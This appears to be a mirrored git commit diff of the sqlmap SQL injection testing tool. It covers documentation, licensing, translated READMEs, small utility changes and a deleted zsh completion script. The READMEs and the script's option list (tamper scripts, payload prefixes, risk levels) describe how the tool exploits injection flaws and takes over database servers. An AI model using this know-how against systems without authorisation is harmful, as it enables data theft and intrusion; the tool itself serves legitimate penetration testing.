Mirror of https://github.com/sqlmapproject/sqlmap.git
Commit 45bb013539
.gitattributes (vendored; 1 line changed)

@@ -1,4 +1,5 @@
 *.py text eol=lf
+*.conf text eol=lf
 
 *_ binary
 *.dll binary
@@ -3,13 +3,13 @@
 ## Reporting bugs
 
 **Bug reports are welcome**!
-Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues) or, alternatively, to the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users).
+Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
 
 ### Guidelines
 
-* Before you submit a bug report, search both open and closed issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
+* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
 * Make sure you can reproduce the bug with the latest development version of sqlmap.
-* Your report should give detailed instructions for how to reproduce the problem. If sqlmap raises an unhandled exception, the traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
+* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
 * If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
 * If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up.
 

@@ -35,4 +35,4 @@ In order to maintain consistency and readability throughout the code, we ask tha
 
 ### Licensing
 
-By submitting code contributions to the sqlmap developers, to the mailing lists, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap project the unlimited, non-exclusive right to reuse, modify, and relicense the code. sqlmap will always be available Open Source, but this is important because the inability to relicense code has caused devastating problems for other Free Software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.
+By submitting code contributions to the sqlmap developers, to the mailing list, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.
README.md (16 lines changed)

@@ -1,6 +1,7 @@
 sqlmap
 ==
 
+
 sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
 
 Screenshots

@@ -19,7 +20,7 @@ Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlm
 
     git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 
-sqlmap works out of the box with [Python](http://www.python.org/download/) version '''2.6.x''' and '''2.7.x''' on any platform.
+sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
 
 Usage
 ----

@@ -32,7 +33,7 @@ To get a list of all options and switches use:
 
     python sqlmap.py -hh
 
-You can find sample runs [here](https://gist.github.com/stamparm/5335217).
+You can find a sample run [here](https://gist.github.com/stamparm/5335217).
 To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki).
 
 Links

@@ -48,5 +49,14 @@ Links
 * Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
 * Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Demos: [#1](http://www.youtube.com/user/inquisb/videos) and [#2](http://www.youtube.com/user/stamparm/videos)
+* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
 * Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+
+Translations
+----
+
+* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
+* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
+* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
+* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
+* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
@@ -1,12 +1,12 @@
 COPYING -- Describes the terms under which sqlmap is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
 
-sqlmap is (C) 2006-2013 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2015 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
-Software Foundation; Version 2 with the clarifications and exceptions
-described below. This guarantees your right to use, modify, and
+Software Foundation; Version 2 (or later) with the clarifications and
+exceptions described below. This guarantees your right to use, modify, and
 redistribute this software under certain conditions. If you wish to embed
 sqlmap technology into proprietary software, we sell alternative licenses
 (contact sales@sqlmap.org).
doc/THANKS.md (512 lines changed; file diff suppressed because it is too large)
@@ -20,6 +20,8 @@ This file lists bundled packages and their associated licensing terms.
 * The Oset library located under thirdparty/oset/.
 Copyright (C) 2010, BlueDynamics Alliance, Austria.
 Copyright (C) 2009, Raymond Hettinger, and others.
+* The PrettyPrint library located under thirdparty/prettyprint/.
+Copyright (C) 2010, Chris Hall.
 * The SocksiPy library located under thirdparty/socks/.
 Copyright (C) 2006, Dan-Haim.
 

@@ -55,7 +57,7 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 Copyright (C) 2008-2009, Jose Fonseca.
 * The KeepAlive library located under thirdparty/keepalive/.
 Copyright (C) 2002-2003, Michael D. Stenner.
-* The MultipartPost library located under thirdparty/multipartpost/.
+* The MultipartPost library located under thirdparty/multipart/.
 Copyright (C) 2006, Will Holcomb.
 * The XDot library located under thirdparty/xdot/.
 Copyright (C) 2008, Jose Fonseca.

@@ -281,8 +283,6 @@ be bound by the terms and conditions of this License Agreement.
 Copyright (C) 2012, Marcel Hellkamp.
 * The PageRank library located under thirdparty/pagerank/.
 Copyright (C) 2010, Corey Goldberg.
-* The PrettyPrint library located under thirdparty/prettyprint/.
-Copyright (C) 2010, Chris Hall.
 * The Termcolor library located under thirdparty/termcolor/.
 Copyright (C) 2008-2011, Volvox Development Team.
 
doc/translations/README-gr-GR.md (new file, 53 lines)

sqlmap
==

Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.

Εικόνες
----



Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.

Εγκατάσταση
----

Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).

Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:

    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.

Χρήση
----

Για να δείτε μια βασική λίστα από επιλογές πατήστε:

    python sqlmap.py -h

Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε:

    python sqlmap.py -hh

Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://gist.github.com/stamparm/5335217).
Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).

Σύνδεσμοι
----

* Αρχική σελίδα: http://sqlmap.org
* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
doc/translations/README-hr-HR.md (new file, 53 lines)

sqlmap
==

sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.

Slike zaslona
----



Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.

Instalacija
----

Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).

Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:

    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.

Korištenje
----

Kako biste dobili listu osnovnih opcija i prekidača koristite:

    python sqlmap.py -h

Kako biste dobili listu svih opcija i prekidača koristite:

    python sqlmap.py -hh

Možete pronaći primjer izvršavanja [ovdje](https://gist.github.com/stamparm/5335217).
Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).

Poveznice
----

* Početna stranica: http://sqlmap.org
* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
doc/translations/README-id-ID.md (new file, 53 lines)

sqlmap
==

sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.

Tangkapan Layar
----



Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.

Instalasi
----

Anda dapat mengunduh tarball versi terbaru [di sini]
(https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).

Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):

    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun.

Penggunaan
----

Untuk mendapatkan daftar opsi dasar gunakan:

    python sqlmap.py -h

Untuk mendapatkan daftar opsi lanjut gunakan:

    python sqlmap.py -hh

Anda dapat mendapatkan contoh penggunaan [di sini](https://gist.github.com/stamparm/5335217).
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki).

Tautan
----

* Situs: http://sqlmap.org
* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Berlangganan milis: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* RSS feed dari milis: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Arsip milis: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos)
* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
doc/translations/README-pt-BR.md (new file, 53 lines)

sqlmap
==

sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.

Imagens
----



Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki.

Instalação
----

Você pode baixar o arquivo tar mais recente clicando [aqui]
(https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).

De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap):

    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas.

Como usar
----

Para obter uma lista das opções básicas faça:

    python sqlmap.py -h

Para obter a lista completa de opções faça:

    python sqlmap.py -hh

Você pode encontrar alguns exemplos [aqui](https://gist.github.com/stamparm/5335217).
Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki).

Links
----

* Homepage: http://sqlmap.org
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki
* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos)
* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
doc/translations/README-zh-CN.md (new file, 52 lines)

sqlmap
==

sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。

演示截图
----



你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示

安装方法
----

你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.

推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:

    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 **2.7.x** 版本的任何平台上

使用方法
----

通过如下命令可以查看基本的用法及命令行参数:

    python sqlmap.py -h

通过如下的命令可以查看所有的用法及命令行参数:

    python sqlmap.py -hh

你可以从 [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。

链接
----

* 项目主页: http://sqlmap.org
* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -3,7 +3,7 @@
 """
 beep.py - Make a beep sound
 
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
extra/cloak/cloak.py (8 lines changed; mode changed from normal file to executable file)

@@ -3,13 +3,13 @@
 """
 cloak.py - Simple file encryption/compression utility
 
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
-import bz2
 import os
 import sys
+import zlib
 
 from optparse import OptionError
 from optparse import OptionParser

@@ -26,7 +26,7 @@ def hideAscii(data):
 
 def cloak(inputFile):
     f = open(inputFile, 'rb')
-    data = bz2.compress(f.read())
+    data = zlib.compress(f.read())
     f.close()
 
     return hideAscii(data)

@@ -34,7 +34,7 @@ def cloak(inputFile):
 def decloak(inputFile):
     f = open(inputFile, 'rb')
     try:
-        data = bz2.decompress(hideAscii(f.read()))
+        data = zlib.decompress(hideAscii(f.read()))
     except:
         print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
         sys.exit(1)
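The change above swaps cloak.py's compression backend from bz2 to zlib while keeping the cloak/decloak round trip symmetric. A minimal sketch of that round trip (hypothetical helper names; sqlmap's own hideAscii() obfuscation step, whose body is not part of this diff, is left out):

    import zlib

    def pack(path):
        # Compress the raw file contents with zlib (bz2 was used before this change)
        with open(path, "rb") as f:
            return zlib.compress(f.read())

    def unpack(blob):
        # Inverse of pack(); zlib.error is raised if blob was not produced by zlib.compress()
        return zlib.decompress(blob)

One practical consequence, assuming no separate migration step elsewhere in the tree: content cloaked by the old bz2-based version can no longer be decloaked by the zlib-based one.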
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -3,7 +3,7 @@
 """
 dbgtool.py - Portable executable to ASCII debug script converter
 
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
Binary file not shown.
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -3,7 +3,7 @@
 """
 safe2bin.py - Simple safe(hex) to binary format converter
 
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -50,7 +50,7 @@ def safecharencode(value):
         for char in SAFE_ENCODE_SLASH_REPLACEMENTS:
             retVal = retVal.replace(char, repr(char).strip('\''))
 
-        retVal = reduce(lambda x, y: x + (y if (y in string.printable or ord(y) > 255) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)())
+        retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)())
 
         retVal = retVal.replace(SLASH_MARKER, "\\\\")
     elif isinstance(value, list):
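The changed reduce() call above adjusts which characters escape hex-encoding: for unicode input, code points from 160 upward are now left untouched, where previously only code points above 255 were. A small modern-Python illustration of the underlying safe(hex) idea, not sqlmap's actual helper:

    import string

    def escape_nonprintable(value):
        # Keep printable characters as-is and render everything else as a \xNN escape,
        # which is the kind of reversible encoding safe2bin.py produces
        return "".join(ch if ch in string.printable else "\\x%02x" % ord(ch) for ch in value)

    print(escape_nonprintable("abc\x01"))  # prints: abc\x01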
Binary file not shown.
Binary file not shown.
Binary file not shown.
Deleted file (177 lines; a zsh completion script for sqlmap)

@@ -1,177 +0,0 @@
#compdef sqlmap.py

# sqlmap completion commands. written by kost
# put this file in your zsh completion dir and restart your shell. Zsh completion dir is usually
# located somewhere in /usr/share/zsh/ or /usr/local/share/zsh

local curcontext="$curcontext" state line

_arguments -C -s \
'(- *)'{--help,-h}'[Show basic help message and exit]' \
'(- *)'-hh'[Show advanced help message and exit]' \
'(-v)'-v+'[Verbosity level: 0-6 (default 1)]:Verbosity level (0-6) - default 1' \
'(-d)'-d+'[Direct connection to the database]' \
'(-u,--url)'{-u+,--url=-}'[Target url]' \
'(-g)'-g+'[Process Google dork results as target urls]' \
'(--data)'--data=-'[Data string to be sent through POST]' \
'(-l)'-l+'[Parse targets from Burp or WebScarab proxy logs]:LOGFILE:_files' \
'(-m)'-m+'[Scan multiple targets enlisted in a given textual file]:BULKFILE:_files' \
'(-r)'-r+'[Load HTTP request from a file]:REQUESTFILE:_files' \
'(-s)'-s+'[Load session from a stored (.sqlite) file]:SESSIONFILE:_files' \
'(-c)'-c+'[Load options from a configuration INI file]:CONFIGFILE:_files' \
'(--param-del)'--param-del=-'[Character used for splitting parameter values]:PDEL' \
'(--cookie)'--cookie=-'[HTTP Cookie header]:COOKIE' \
'(--load-cookies)'--load-cookies=-'[File containing cookies in Netscape/wget format]:COOKIEFILE:_files' \
'(--drop-set-cookie)'--drop-set-cookie'[Ignore Set-Cookie header from response]' \
'(--user-agent)'--user-agent=-'[HTTP User-Agent header]:HTTP User Agent' \
'(--random-agent)'--random-agent'[Use randomly selected HTTP User-Agent header]' \
'(--randomize)'--randomize=-'[Randomly change value for given parameter(s)]:RPARAM' \
'(--force-ssl)'--force-ssl'[Force usage of SSL/HTTPS requests]' \
'(--host)'--host=-'[HTTP Host header]:Host Header' \
'(--referer)'--referer=-'[HTTP Referer header]:REFERER' \
'(--headers)'--headers=-'[Extra headers (e.g. Accept-Language: fr\nETag: 123)]:HEADERS' \
'(--auth-type)'--auth-type=-'[HTTP authentication type (Basic, Digest or NTLM)]:ATYPE' \
'(--auth-cred)'--auth-cred=-'[HTTP authentication credentials (name:password)]:ACRED' \
'(--auth-cert)'--auth-cert=-'[HTTP authentication certificate (key_file,cert_file)]:ACERT:_files' \
'(--proxy)'--proxy=-'[Use a HTTP proxy to connect to the target url]:PROXY' \
'(--proxy-cred)'--proxy-cred=-'[HTTP proxy authentication credentials (name:password)]:PCRED' \
'(--ignore-proxy)'--ignore-proxy'[Ignore system default HTTP proxy]' \
'(--delay)'--delay=-'[Delay in seconds between each HTTP request]:DELAY' \
'(--timeout)'--timeout=-'[Seconds to wait before timeout connection (default 30)]:TIMEOUT' \
'(--retries)'--retries=-'[Retries when the connection timeouts (default 3)]:RETRIES' \
'(--scope)'--scope=-'[Regexp to filter targets from provided proxy log]:SCOPE' \
'(--safe-url)'--safe-url=-'[Url address to visit frequently during testing]:SAFURL' \
'(--safe-freq)'--safe-freq=-'[Test requests between two visits to a given safe url]:SAFREQ' \
'(--skip-urlencode)'--skip-urlencode'[Skip URL encoding of payload data]' \
'(--eval)'--eval=-'[Evaluate provided Python code before the request (e.g.]:EVALCODE' \
'(-o)'-o'[Turn on all optimization switches]' \
'(--predict-output)'--predict-output'[Predict common queries output]' \
'(--keep-alive)'--keep-alive'[Use persistent HTTP(s) connections]' \
'(--null-connection)'--null-connection'[Retrieve page length without actual HTTP response body]' \
'(--threads)'--threads=-'[Max number of concurrent HTTP(s) requests (default 1)]:THREADS' \
'(-p)'-p+'[Testable parameter(s)]:TESTPARAMETER' \
'(--dbms)'--dbms=-'[Force back-end DBMS to this value]:DBMS:->list-dbms' \
'(--os)'--os=-'[Force back-end DBMS operating system to this value]:OS:->list-os' \
'(--invalid-bignum)'--invalid-bignum'[Use big numbers for invalidating values]' \
'(--invalid-logical)'--invalid-logical'[Use logical operations for invalidating values]' \
'(--no-cast)'--no-cast'[Turn off payload casting mechanism]' \
'(--no-escape)'--no-unescape'[Turn off string escaping mechanism]' \
'(--prefix)'--prefix=-'[Injection payload prefix string]:PREFIX' \
'(--suffix)'--suffix=-'[Injection payload suffix string]:SUFFIX' \
'(--skip)'--skip=-'[Skip testing for given parameter(s)]:SKIP' \
'(--tamper)'--tamper=-'[Use given script(s) for tampering injection data]:TAMPER' \
'(--level)'--level=-'[Level of tests to perform (1-5, default 1)]:LEVEL (1-5), default 1' \
'(--risk)'--risk=-'[Risk of tests to perform (0-3, default 1)]:RISK (0-3), default 1' \
'(--string)'--string=-'[String to match when query is evaluated to True]:STRING' \
'(--not-string)'--not-string=-'[String to match when query is evaluated to False]:NOTSTRING' \
